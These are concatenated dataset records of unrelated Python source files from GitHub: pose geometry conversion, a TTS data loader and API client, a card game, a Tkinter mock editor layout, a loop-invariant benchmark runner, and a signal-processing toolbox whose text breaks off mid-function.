Image.new('RGB', (180 + 20, int(max_distance/2)), color='black')\n points_parameter_space = {}\n draw = ImageDraw.Draw(img_parameter_space)\n for i in range(0, 14, 1):\n degree = degree_disc = theta = rho1 = rho2 = 0\n x1, y1, x2, y2, color_id, id1, id2 = return_body_points_coord(i, body_parts)\n if x1 > 0 and y1 > 0 and x2 > 0 and y2 > 0:\n print(i)\n #print('x1:\\t%i\\ty1:\\t%i\\t\\tx2:\\t%i\\ty2:\\t%i' % (x1, y1, x2, y2))\n if y1 - y2 != 0:\n theta = np.arctan((x2 - x1) / (y1 - y2))\n else:\n theta = 0\n\n # here convert theta from radians to degrees\n degree = round(theta * (180 / np.pi))\n\n # here find theta in thetas discrete list (only for image plot)\n degree_disc = min(range(len(thetas)), key=lambda x: abs(thetas[x] - theta))\n # position_min_degree = min(thetas, key=lambda x: abs(x - theta))\n\n # compute rho from theta\n rho1 = x1 * np.cos(theta) + y1 * np.sin(theta)\n rho2 = x2 * np.cos(theta) + y2 * np.sin(theta)\n print(rho1, rho2)\n\n print(int(rho1), int(degree), x1, y1)\n # draw ellipse that represent body part in parameter space\n draw.ellipse((degree_disc - 6, abs(rho1) - 6, degree_disc + 6, abs(rho1) + 6), fill=get_color(color_id))\n # degree vs rho\n if draw_body_ids:\n font = ImageFont.truetype('/usr/share/fonts/truetype/freefont/FreeMono.ttf', 10)\n draw.text((degree, abs(rho1)), '%i-%i' % (id1, id2), font=font, fill=(255, 255, 255, 128))\n\n #print('theta Calc:\\t%.4f\\t\\trho Calc:\\t\\t%i' % (theta, rho1))\n #print('Theta Find:\\t%.4f\\t\\tAngulo:\\t\\t%.2f' % (position_min_degree, degree))\n #print('\\n')\n\n #points_parameter_space[i] = (degree_disc, rho1)\n points_parameter_space[i] = (degree, degree_disc, theta, int(rho1))\n\n return img_parameter_space, points_parameter_space\n\n\ndef return_body_points_coord(i, body_parts):\n x1 = y1 = x2 = y2 = x = color_id = id1 = id2 = 0\n if i == 0: # 1 => 0 Neck\n x = 13\n elif i == 1: # 1 => 8 Upper body\n x = 0\n elif i == 2: # 2 => 3 Right Arm\n x = 3\n elif i == 3: # 3 => 4 Right Forearm\n x = 4\n elif i == 4: # 5 => 6 Left Arm\n x = 5\n elif i == 5: # 6 => 7 Left Forearm\n x = 6\n elif i == 6: # 9 => 10 Right Thigh\n x = 8\n elif i == 7: # 10 => 11 Right Leg\n x = 9\n elif i == 8: # 12 => 13 Left Thigh\n x = 11\n elif i == 9: # 13 => 14 Left Leg\n x = 12\n elif i == 10: # 8 => 9 Right Hip\n x = 7\n elif i == 11: # 8 => 12 Left Hip\n x = 10\n elif i == 12: # 1 => 2 Right Shoulder\n x = 1\n elif i == 13: # 1 => 5 Left Shoulder\n x = 2\n\n x = x * 2\n if (len(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]]) > 0 and len(\n body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]]) > 0):\n x1, y1 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]])\n x2, y2 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]])\n color_id = POSE_BODY_25_PAIRS_RENDER_GPU[x + 1] * 3\n id1 = POSE_BODY_25_PAIRS_RENDER_GPU[x]\n id2 = POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]\n\n return x1, y1, x2, y2, color_id, id1, id2\n\n\ndef draw_body(body_parts, height, width):\n img = Image.new('RGB', (width, height), color='black')\n draw = ImageDraw.Draw(img)\n\n for k in sorted(body_parts):\n if len(body_parts[k]) > 0:\n x, y = get_max_prob(body_parts[k])\n draw.point((x, y), fill=get_color(k * 3))\n\n ctd = 0\n for x in range(0, len(POSE_BODY_25_PAIRS_RENDER_GPU), 2):\n print(x, x + 1)\n print(POSE_BODY_25_PAIRS_RENDER_GPU[x], POSE_BODY_25_PAIRS_RENDER_GPU[x + 1])\n print(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]], body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]])\n print('\\n')\n if (len(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]]) > 0 and len(\n body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]]) > 0):\n x1, y1 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x]])\n x2, y2 = get_max_prob(body_parts[POSE_BODY_25_PAIRS_RENDER_GPU[x + 1]])\n draw.line((x1, y1, x2, y2), fill=get_color(POSE_BODY_25_PAIRS_RENDER_GPU[x + 1] * 3), width=1)\n ctd = ctd + 1\n print(ctd)\n\n img.show()\n img.save('pil_red.png')\n\n\ndef get_max_prob(body_part):\n m = 0\n x = 0\n y = 0\n for p in range(0, len(body_part), 3):\n if body_part[p + 2] > m:\n m = float(body_part[p + 2])\n x = int(body_part[p])\n y = int(body_part[p + 1])\n\n return x, y\n\n\ndef get_color(k):\n return POSE_BODY_25_COLORS_RENDER_GPU[k], \\\n POSE_BODY_25_COLORS_RENDER_GPU[k + 1], \\\n POSE_BODY_25_COLORS_RENDER_GPU[k + 2]\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"murilovarges/HARBoP","sub_path":"tools/ParameterSpaceConversion/convert_poses_parameter_space.py","file_name":"convert_poses_parameter_space.py","file_ext":"py","file_size_in_byte":10844,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"45"} +{"seq_id":"42268452643","text":"import os\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\n\n\nclass Dataset(Dataset):\n def __init__(self, path, mels_directory):\n data_files = np.loadtxt(path, dtype='str', delimiter='|')\n self.data_ids = data_files[:, 0]\n self.phonetics = data_files[:, 1]\n self.mels_directory = mels_directory\n\n def mels(self, id):\n file_path = os.path.join(self.mels_directory, id + '.npy')\n mels = torch.from_numpy(np.load(file_path))\n return mels\n\n\n def texts(self, phonetics):\n phonetics_id = [int(id) for id in phonetics.split()]\n return torch.IntTensor(phonetics_id)\n\n def mels_texts(self, path, phonetics):\n\n mels = self.mels(path)\n texts = self.texts(phonetics)\n return texts, mels\n\n def __getitem__(self, i):\n return self.mels_texts(self.data_ids[i], self.phonetics[i])\n\n def __len__(self):\n return len(self.data_ids)\n\n\nclass OrganizeData:\n\n def __init__(self, n_f_p_s):\n self.number_framesPerStep = n_f_p_s\n\n def __call__(self, batch):\n in_len, sorted_ids = torch.sort(\n torch.LongTensor([len(temp[0]) for temp in batch]),\n dim=0, descending=True)\n in_len_max = in_len[0]\n \n mels_len = batch[0][1].size(0)\n length_max = 0\n for i in range(len(sorted_ids)):\n length_max = max(length_max, batch[sorted_ids[i]][1].size(1))\n\n mod = length_max % self.number_framesPerStep\n\n if mod != 0:\n length_max = length_max + self.number_framesPerStep - mod\n\n padded_result = torch.FloatTensor(\n len(batch), length_max).zero_()\n\n padded_mel = torch.FloatTensor(\n len(batch), mels_len, length_max).zero_()\n\n out_len = torch.LongTensor(len(batch))\n\n for i, id in enumerate(sorted_ids):\n melspectogram = batch[id][1]\n padded_mel[i, :, :melspectogram.size(1)] = melspectogram\n out_len[i] = melspectogram.size(1)\n padded_result[i, melspectogram.size(1) - 1:] = 1\n\n padded_text = torch.LongTensor(len(batch), in_len_max)\n padded_text.zero_()\n for i,id in enumerate(sorted_ids):\n data = batch[id][0]\n padded_text[i, :data.size(0)] = data\n\n return padded_text, in_len, padded_mel, padded_result, out_len\n","repo_name":"ahmed-8areeb/tts","sub_path":"data/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36047305782","text":"from game.card import Card\n\n\nclass Director:\n \"\"\"A person who directs the game. \n \n The responsibility of a Director is to control the sequence of play.\n\n Attributes:\n current_card (Instance of a class): An instance of Card class.\n is_playing (boolean): Whether or not the game is being played.\n total_score (int): The score for the entire game.\n \"\"\"\n\n def __init__(self):\n \"\"\"Constructs a new Director.\n \n Args:\n self (Director): an instance of Director.\n \"\"\"\n \n self.is_playing = True\n self.total_score = 300\n self.current_card = \"\"\n\n card = Card()\n self.current_card = card\n\n def start_game(self):\n \"\"\"Starts the game by running the main game loop.\n \n Args:\n self (Director): an instance of Director.\n \"\"\"\n while self.is_playing:\n self.get_inputs()\n self.do_updates()\n self.do_outputs()\n\n def get_inputs(self):\n \"\"\"Ask the user if they want to continue playing.\n\n Args:\n self (Director): An instance of Director.\n \"\"\"\n self.current_card.next_card()\n print(f\"The card is: {self.current_card.last_card} {self.current_card.last_suit}\")\n guess_card = input(\"Higher or lower? [h/l] \")\n self.is_playing = (guess_card == \"h\" or guess_card == \"l\")\n \n self.current_card.decision = guess_card\n\n \n def do_updates(self):\n \"\"\"Evaluates the player's decision and updates his score.\n\n Args:\n self (Director): An instance of Director.\n \"\"\"\n if not self.is_playing:\n return \n\n self.current_card.evaluate()\n self.current_card.next_card()\n\n self.total_score += self.current_card.points\n\n def do_outputs(self):\n \"\"\"Displays the next card's value and the score. \n Also asks the player if he want to play again. \n\n Args:\n self (Director): An instance of Director.\n \"\"\"\n if not self.is_playing:\n return\n \n\n print(f\"Next card was: {self.current_card.last_card} {self.current_card.last_suit}\")\n print(f\"Your score is: {self.total_score}\")\n self.is_playing = (self.total_score > 0)\n playagain = input(\"Play again? [y/n] \")\n self.is_playing = (playagain == \"y\")\n print()\n\n\n if not self.is_playing:\n print(\"Game Over!\")\n ","repo_name":"jacobsanchezbejarano/cse210-02","sub_path":"cardsgame/cards/game/director.py","file_name":"director.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9354868810","text":"# -*- coding: utf-8 -*-\r\n\r\nimport base64\r\nimport json\r\nimport time\r\nimport hashlib\r\nimport requests\r\nimport os.path\r\nfrom sys import argv\r\nimport codecs\r\nimport subprocess\r\n\r\n\r\nclass xfyun_tts:\r\n api_url = \"http://api.xfyun.cn/v1/service/v1/tts\" # api url\r\n API_KEY = \"fbebb5e5550912b63b03e16491546484\" # APP KEY\r\n APP_ID = \"5c78da89\" # APP ID\r\n OUTPUT_PATH = \"./\" # out put path of voice file\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Params can find in https://doc.xfyun.cn/rest_api/%E8%AF%AD%E9%9F%B3%E5%90%88%E6%88%90.html\r\n \"\"\"\r\n self.Param = {\r\n \"auf\": \"audio/L16;rate=16000\", # voice rate\r\n \"aue\": \"lame\", # voice encoding. raw(wav) or lame(mp3)\r\n \"voice_name\": \"xiaoyan\", # xiaoyan x_xiaofeng\r\n \"speed\": \"50\", # voice speed [0,100]\r\n \"volume\": \"80\", # voice volume [0,100]\r\n \"pitch\": \"50\", # voice pitch [0,100]\r\n \"engine_type\": \"aisound\" # aisound | intp65 | intp65_en\r\n }\r\n\r\n def text_to_mp3(self, _text, _id):\r\n param_str = json.dumps(self.Param) # 得到明文字符串\r\n param_utf8 = param_str.encode('utf8') # 得到utf8编码(bytes类型)\r\n param_b64 = base64.b64encode(param_utf8) # 得到base64编码(bytes类型)\r\n param_b64str = param_b64.decode('utf8') # 得到base64字符串\r\n\r\n time_now = str(int(time.time()))\r\n checksum = (self.API_KEY + time_now + param_b64str).encode('utf8')\r\n checksum_md5 = hashlib.md5(checksum).hexdigest()\r\n header = {\r\n \"X-Appid\": self.APP_ID,\r\n \"X-CurTime\": time_now,\r\n \"X-Param\": param_b64str,\r\n \"X-CheckSum\": checksum_md5\r\n }\r\n\r\n body = {\r\n \"text\": _text\r\n }\r\n\r\n # HTTP POST\r\n response = requests.post(self.api_url, data=body, headers=header)\r\n response_head = response.headers['Content-Type']\r\n\r\n if response_head == \"audio/mpeg\":\r\n save_file = os.path.join(self.OUTPUT_PATH, _id + '.mp3')\r\n out_file = open(save_file, 'wb')\r\n data = response.content\r\n out_file.write(data)\r\n out_file.close()\r\n print('Out Put File: ' + save_file)\r\n else:\r\n print(response.content.decode('utf8'))\r\n\r\n\r\nif __name__ == '__main__':\r\n text = \"\"\r\n xftts = xfyun_tts()\r\n\r\n if len(argv) == 1: # no input file\r\n text = input(\"Please input the text:\")\r\n else:\r\n text_file = argv[1]\r\n if os.path.isfile(text_file):\r\n f = codecs.open(text_file, 'r', encoding='utf-8')\r\n text = f.read()\r\n f.close()\r\n else:\r\n text = argv[1]\r\n\r\n _l = len(text)\r\n seek = 300\r\n i = 0\r\n combinf = []\r\n if seek >= _l:\r\n xftts.text_to_mp3(text, str(i))\r\n else:\r\n while seek < _l:\r\n txt = text[seek - 300:seek]\r\n xftts.text_to_mp3(txt, str(i))\r\n combinf.append(str(i)+'.mp3')\r\n i += 1\r\n seek += 300\r\n if seek >= _l:\r\n seek = _l\r\n txt = text[seek - 300:seek]\r\n xftts.text_to_mp3(txt, str(i))\r\n combinf.append(str(i)+'.mp3')\r\n args = 'ffmpeg.exe -i \"concat:%s\" -acodec copy output.mp3' % '|'.join(combinf)\r\n subprocess.call(args, shell=True)\r\n","repo_name":"codingtoworld/xfyun_tts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"29808022881","text":"from tkinter import *\r\n\r\nroot = Tk()\r\nroot.geometry('870x290')\r\nroot.minsize(870, 290)\r\nroot.maxsize(870, 290)\r\n\r\nroot.title(\"Dweep Text Editor\")\r\n\r\nframe1 = Frame(root,bg = \"Black\", borderwidth=10)\r\nframe1.grid(sticky=\"nw\",padx=50) # giving padx for making space for bitmaps\r\n\r\nb1 = Button(frame1, text = \"File\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb1.grid(row=0 , column=0, sticky=\"e\")\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\")\r\nspace.grid(row=1 , column=0 , sticky=\"w\")\r\n\r\ntitle = Label(frame1, text = \"Your files:- \", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\ntitle.grid(row=2 , column=0 , sticky=\"w\")\r\n\r\nb3 = Button(frame1, text = \"Password Manager.txt\", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\nb3.grid(row=3 , column=0 , sticky=\"w\")\r\n\r\nb4 = Button(frame1, text = \"Tkinter_Practice.py\", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\nb4.grid(row=4 , column=0, sticky=\"w\")\r\n\r\nb5 = Button(frame1, text = \"Sample_Text_Editor.py\", bg = \"Black\", fg = \"lime\", font = \"algerian 12\")\r\nb5.grid(row=5 , column=0, sticky=\"w\")\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\")\r\nspace.grid(row=2 , column=1 , sticky=\"w\") # Space between 'file' and 'edit'\r\n\r\nb6 = Button(frame1, text = \"Edit\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb6.grid(row=0 , column= 2)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\")\r\nspace.grid(row=2 , column=3 , sticky=\"w\") # Space between 'edit' and 'selection'\r\n\r\nb7 = Button(frame1, text = \"Selection\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb7.grid(row=0 , column=4)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'selection' and 'view'\r\nspace.grid(row=2 , column=5 , sticky=\"w\")\r\n\r\nb8 = Button(frame1, text = \"View\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb8.grid(row=0, column=6)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'view' and 'go'\r\nspace.grid(row=2 , column=7 , sticky=\"w\")\r\n\r\nb9 = Button(frame1, text = \"Go\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb9.grid(row=0, column=8)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'go' and 'run'\r\nspace.grid(row=2 , column=9 , sticky=\"w\")\r\n\r\nb10 = Button(frame1, text = \"Run\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb10.grid(row=0, column=10)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'run' and 'terminal'\r\nspace.grid(row=2 , column=11 , sticky=\"w\")\r\n\r\nb11 = Button(frame1, text = \"Terminal\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb11.grid(row=0, column=12)\r\n\r\nspace = Label(frame1, text = \" \", bg = \"Black\") # Space between 'terminal' and 'help'\r\nspace.grid(row=2 , column=13 , sticky=\"w\")\r\n\r\nb12 = Button(frame1, text = \"Help\", bg = \"Black\", fg = \"grey\", font = \"algerian 12\")\r\nb12.grid(row=0, column=14)\r\n\r\nframe2 = Frame(root, bg = \"black\", borderwidth=5) # 2nd Frame for bitmaps at 'nw' side\r\nframe2.grid(row=0,column=0,sticky=\"nw\")\r\n\r\nb14 = Button(frame2, bitmap=\"question\",border=12, bg=\"red\")\r\nb14.grid(row=0 , column=0)\r\n\r\nb15 = Button(frame2, bitmap=\"questhead\",border=12, bg=\"red\")\r\nb15.grid(row=1 , column=0)\r\n\r\nb16 = Button(frame2, bitmap=\"info\",border=12, bg=\"red\")\r\nb16.grid(row=2 , column=0)\r\n\r\nb17 = Button(frame2, bitmap=\"warning\",border=12, bg=\"red\")\r\nb17.grid(row=3 , column=0)\r\n\r\nb18 = Button(frame2, bitmap=\"hourglass\",border=12, bg=\"red\")\r\nb18.grid(row=4 , column=0)\r\n\r\nb19 = Button(frame2, bitmap=\"gray50\",border=12, bg=\"red\")\r\nb19.grid(row=5 , column=0)\r\n\r\nroot.mainloop()\r\n# Menu widget required to decorate it more beautifully\r\n","repo_name":"ShadProgrammer/My-Tkinter-Codes","sub_path":"Sample_Text_Editor.py","file_name":"Sample_Text_Editor.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9192766867","text":"from gcln_code2inv import gcln_infer\nfrom condition_parser import parse_conditions, fast_checker\nimport time\nimport sys, os\nfrom z3 import Real, And\nimport numpy as np\n\n\ndef run_code2inv_problem(i):\n verbose=False\n solved=False\n if i in [26, 27, 31, 32, 61, 62, 72, 75, 106]:\n print(i,'theoretically unsolvable')\n return True, 0\n\n start_time = time.time()\n attempts = 0\n first_time = True\n max_epoch = 2000\n I = None\n while (solved == False):\n attempts += 1\n if attempts > 10:\n # print('failed', i)\n # return False\n break\n\n if first_time:\n solved, I = fast_checker(i)\n if solved:\n break\n else:\n non_loop_invariant = None\n if i in [110, 111, 112, 113]:\n non_loop_invariant = And(Real('sn') == 0, Real('i') == 1, Real('n') < 0)\n elif i in [118, 119, 122, 123]:\n non_loop_invariant = And(Real('sn') == 0, Real('i') == 1, Real('size') < 0)\n\n solved, I = gcln_infer(i, max_epoch=max_epoch, \n non_loop_invariant=non_loop_invariant) \n\n first_time = False\n max_epoch += 1000\n\n end_time = time.time()\n runtime = end_time - start_time\n\n print('Problem number:', i, 'solved?',solved, 'time:', runtime)\n if I is not None:\n print(I)\n return solved, runtime\n\nif __name__=='__main__':\n if not os.path.isdir('../benchmarks/code2inv/conditions'):\n print('preprocessing source files...')\n parse_conditions()\n if len(sys.argv) > 1:\n print('running problem', sys.argv[1])\n problem = int(sys.argv[1])\n run_code2inv_problem(problem)\n else:\n print('running entire code2inv benchmark, use python run_code2inv.py to run single problem')\n total_solved = 0\n total = 0\n unsolvable = 0\n runtimes = []\n for i in range(1, 134):\n solved, runtime = run_code2inv_problem(i)\n if i in [26, 27, 31, 32, 61, 62, 72, 75, 106]:\n unsolvable += 1\n else:\n total += 1\n total_solved += solved\n runtimes.append(runtime)\n print('Solved {}/{} solvable problems, {} theoretically unsolvable problems'.format(total_solved, total, unsolvable))\n print('Avg. Runtime: {:0.1f}s, Max Runtime: {:0.1f}s'.format(np.mean(runtimes), np.max(runtimes)))\n print()\n print('Summary:')\n print('Solved {}/{} solvable problems, {} theoretically unsolvable problems'.format(total_solved, total, unsolvable))\n print('Avg. Runtime: {:0.1f}s, Max Runtime: {:0.1f}s'.format(np.mean(runtimes), np.max(runtimes)))\n\n\n","repo_name":"jyao15/G-CLN","sub_path":"gcln_model/run_code2inv.py","file_name":"run_code2inv.py","file_ext":"py","file_size_in_byte":2772,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"45"} +{"seq_id":"70427126537","text":"\"\"\"\nAmplitude Modulation Analysis Toolbox\n\"\"\"\n\nimport numpy as np\nimport scipy.signal\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\n\ndef conv_m(a, b, mode='full'):\n \"\"\"Convolve a vector with collection of vectors.\n\n Convolve a 1D array `a` with each column of the 2D array `b`. \n \n Convolution is carried out with `scipy.signal.fftconvolve`\n \n Parameters\n ----------\n a : 1D array\n 1D array input\n \n b : 1D or 2D array_like\n 1D or 2D array input\n \n mode : str {'full', 'same'}, optional\n A string indicating the size of the output:\n\n ``full``\n The output is the full discrete linear convolution\n of the inputs. (Default)\n ``same``\n The output is the same size as `a`, centered\n with respect to the 'full' output.\n\n Returns\n -------\n c : 2D array\n A 2D array where each columns corresponds to the \n convolution of `a` and a column of `b`\n \n See Also\n --------\n `scipy.signal.fftconvolve()`\n \n \"\"\"\n # input vector 'a' to 1 dimension\n a = a.ravel()\n # number of samples vector 'a'\n siz_a = len(a)\n \n # input 'b' as 2D matrix [samples, columns]\n try:\n b.shape[1]\n except IndexError:\n b = b[:, np.newaxis]\n \n # number of samples and number of channels in input 'b'\n siz_b, col_b = b.shape\n \n # allocate space for result\n if mode == 'same':\n c = np.zeros((siz_a, col_b) , dtype = complex)\n elif mode == 'full':\n N = siz_a + siz_b - 1\n c = np.zeros((N , col_b), dtype = complex)\n \n # 1D convolutions per columns in 'b' \n for ix in range(0 , col_b):\n c[:,ix] = scipy.signal.fftconvolve(a, b[:,ix] , mode)\n \n return c\n\n\ndef epoching(data, samples_epoch, samples_overlap = 0):\n \"\"\"Divide an array in a colletion of smaller arrays\n \n Divides the `data` provided as [n_samples, n_channels] using the \n `size_epoch` indicated (in samples) and the `overlap_epoch` between \n consecutive epochs.\n \n Parameters\n ----------\n data : 2D array \n with shape (n_samples, n_channels)\n\n samples_epochs : \n number of samples in smaller epochs\n \n samples_overlap : \n number of samples for ovelap between epochs (Default 0)\n\n\n Returns\n -------\n epochs : 3D array \n with shape (samples_epoch, n_channels, n_epochs)\n \n remainder : 2D array \n with the remaining data after last complete epoch\n \n ix_center : 1D array\n indicates the index tha corresponds to the center of the nth epoch.\n\n \"\"\" \n # input 'data' as 2D matrix [samples, columns]\n try:\n data.shape[1]\n except IndexError:\n data = data[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = data.shape\n\n # Size of half epoch\n half_epoch = np.ceil(samples_epoch / 2 )\n\n # Epoch shift \n samples_shift = samples_epoch - samples_overlap\n\n # Number of epochs\n n_epochs = int(np.floor( (n_samples - samples_epoch) / float(samples_shift) ) + 1 )\n if n_epochs == 0:\n return np.array([]), data, np.array([])\n\n #markers indicates where the epoch starts, and the epoch contains samples_epoch rows\n markers = np.asarray(range(0,n_epochs)) * samples_shift\n markers = markers.astype(int)\n\n #Divide data in epochs\n epochs = np.zeros((samples_epoch, n_channels, n_epochs))\n ix_center = np.zeros((n_epochs,1))\n\n for i_epoch in range(0,n_epochs):\n epochs[:,:,i_epoch] = data[ markers[i_epoch] : markers[i_epoch] + samples_epoch ,:]\n ix_center[i_epoch] = markers[i_epoch] -1 + half_epoch\n \n if ( (markers[-1] + samples_epoch) < n_samples): \n remainder = data[markers[-1] + samples_epoch : n_samples, :]\n else:\n remainder = np.asarray([])\n \n return epochs, remainder, ix_center.astype(int)\n\ndef iepoching(epochs, shift_epoch):\n \"\"\"\n Merges a set of epochs [n_samples_epoch, n_channels] into \n the complete signal(s) x [n_samples, n_channels] taking into account\n the shift between consecutive epochs\n \n Parameters\n ----------\n epochs : 2D array_like with shape (n_samples, n_channels)\n shift_epoch : number of samples in smaller epochs\n\n Returns\n -------\n x : 2D array with shape (samples_epoch, n_channels, n_epochs)\n\n \"\"\"\n \n # obtain parameters\n (size_epoch, n_channels, n_epochs) = epochs.shape\n n_samples = (shift_epoch * (n_epochs - 1)) + size_epoch\n ix = np.arange(n_epochs) * shift_epoch\n \n # merging matrix\n merging = np.zeros((n_samples, n_channels, 2))\n # Number of epochs that contribute for a specific point\n n_merging = np.zeros((n_samples, n_channels, 2))\n \n for i_epoch in range(n_epochs):\n merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1 ] = epochs[:, :, i_epoch]\n n_merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1] = 1\n merging[:,:,0] = np.sum(merging, axis=2)\n n_merging[:,:,0] = np.sum(n_merging, axis=2)\n merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1 ] = 0\n n_merging[ix[i_epoch] : ix[i_epoch] + size_epoch, :, 1 ] = 0\n \n x = np.divide(merging[:,:,0], n_merging[:,:,0]) \n return x \n\n\ndef cmorlet_wavelet(x, fs, freq_vct, n=6, normalization=True):\n \"\"\"Perform the continuous wavelet (CWT) tranform using the complex Morlet wavelet.\n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or \n 2D array with shape (n_samples, n_channels)\n fs : Sampling frequency \n in Hz\n freq_vct : 1D array \n with frequencies to compute the CWT (Default = [1 : 1 : fs/2] )\n n : Number of cicles inside the Gaussian curve \n (Default 6)\n normalization : Scale each wavelet to have energy equal to 1\n (Default True) \n\n\n Returns\n -------\n wcoef : Complex wavelet coefficients \n 2D array with shape [n_samples, n_freqs] if `x` is 1D array\n 3D array with shape [n_samples, n_freqs, n_channels] if `x` is 2D array\n \n wfam : 2D array with shape [n_wavelet_samples, n_freqs] where each column\n corresponds to the a member of the wavelet family\n \n \"\"\"\n # input 'x' as 2D matrix [samples, columns]\n try:\n x.shape[1]\n except IndexError:\n x = x[:, np.newaxis]\n \n # number of samples and number of channels\n n_samples, n_channels = x.shape\n \n # number of wavelets\n n_freqs = len(freq_vct)\n\n # number of samples for Wavetet family\n # This is equal to the number of samples needed to represent 2*n cycles \n # of a sine with frequency = fres(1)[Hz], sampled at fs [Hz]. \n # This is done to ensure that every wavelet in the wavalet family will be \n # close to 0 in the negative and positive edges\n n_samples_wav = np.round( (2*n/freq_vct[0])*fs )\n\n # The wavelet will be symmetrical around 0\n if np.mod(n_samples_wav,2) == 0: # even samples\n n_samples_wav = n_samples_wav + 1\n\n # create time vector for Wavelet family\n half = np.floor(n_samples_wav/2)\n time = np.arange(-half, half+1)/fs\n\n # initialize Wavelet family matrix\n wfam = np.zeros([len(time), n_freqs], dtype=complex)\n\n # for each frequency defined in FREQ, create its respective Wavelet\n for iwav in range(n_freqs):\n s = n/(2*np.pi*freq_vct[iwav])\n gaussian_win = np.exp((-time**2)/(2*s**2))\n sinwave = np.exp(2*np.pi*1j*freq_vct[iwav]*time)\n if normalization:\n # each wavelet has unit energy sum(abs(wavelet).^2)) = 1\n A = 1. / ((s**2) * np.pi) ** (1./4)\n else:\n A = 1.\n # Complex Morlet wavelet\n wfam[:, iwav] = A * sinwave * gaussian_win\n\n wcoef = np.zeros((n_samples, n_freqs, n_channels), dtype=complex)\n\n if n_channels == 1:\n # one channel\n tmp = conv_m(x, wfam, 'same')\n wcoef[:, :, 0] = tmp \n else:\n # convolution between signal X and the each Wavelt in the Wavelet family\n for i_channel in range(n_channels):\n x_tmp = x[:, i_channel]\n tmp = conv_m(x_tmp, wfam, 'same')\n wcoef[:, :, i_channel] = tmp \n\n return wcoef, wfam\n\n\ndef rfft(x, n=None, dim=None):\n \"\"\"Real Fast Fourier Transform.\n \n Considering a real signal A with B = fft(A), B is Hermitian symmetric,\n i.e. B(-1) = conj(B(1)), therefore the complete spectrum B\n can be found by using with only the non-negative frequencies in B\n \n \n Parameters\n ----------\n x : 1D array with shape (n_samples) or\n 2D array with shape (n_samples, n_channels)\n \n n : Number of samples to compute the FFT\n (Default = n_samples in array x) \n dim : Dimension to compute the RFFT \n (Default: first array dimension whose size does not equal 1)\n\n Returns\n -------\n y : Non-negative complex spectrum of `x` with shape as `x`\n \n See Also\n --------\n `np.fft.fft()`\n \n \"\"\"\n\n # shape of x\n shape_x = x.shape\n # number of dimentions\n dim_x = len(shape_x)\n \n # limits to 2-dimention data\n assert dim_x<=2\n \n # check shape of X, and set n and dim defaults\n if dim_x == 1:\n dim_def = 0\n else:\n if shape_x[0] == 1:\n # shape [1, n_samples] (row vector)\n dim_def = 1\n elif shape_x[1] == 1:\n # shape [n_samples, 1] (column vector)\n dim_def = 0 \n else:\n # X is a 2D Matrix, a shape [n_samples, n_channels] is asummed\n dim_def = 0\n \n if dim is None:\n dim = dim_def\n \n if n is None:\n n = shape_x[dim]\n \n # FFT\n yc = np.fft.fft(x, n=n, axis=dim)\n \n # points to keep\n if n%2 == 0: \n # even case\n n_new = int((n / 2) + 1)\n else:\n # odd case\n n_new = int((n + 1) / 2)\n \n if dim_x == 1:\n y = yc[0:n_new]\n else:\n if dim == 0:\n y = yc[0:n_new,:] \n else:\n y = yc[:, 0:n_new]\n \n return y\n\ndef irfft(y, n=None, dim=None):\n '''\n The IRFFT function returns the Inverse DFT (using the RFFT algorithm)of\n a spectrum Y containing ONLY the positive frequencies, with the\n assumption than Y is the positive half of a Hermitian Symmetric spectrum\n from a real signal X.\n \n Parameters\n ----------\n y : 1D or 2D array with the positive spectrum of \n real-valued signals with shape (n_samples, n_channels)\n n : Number of samples in the original x signals \n N not provided. Y is assumed be obtained from a signal X with even number fo samples \n dim : Dimension to compute the 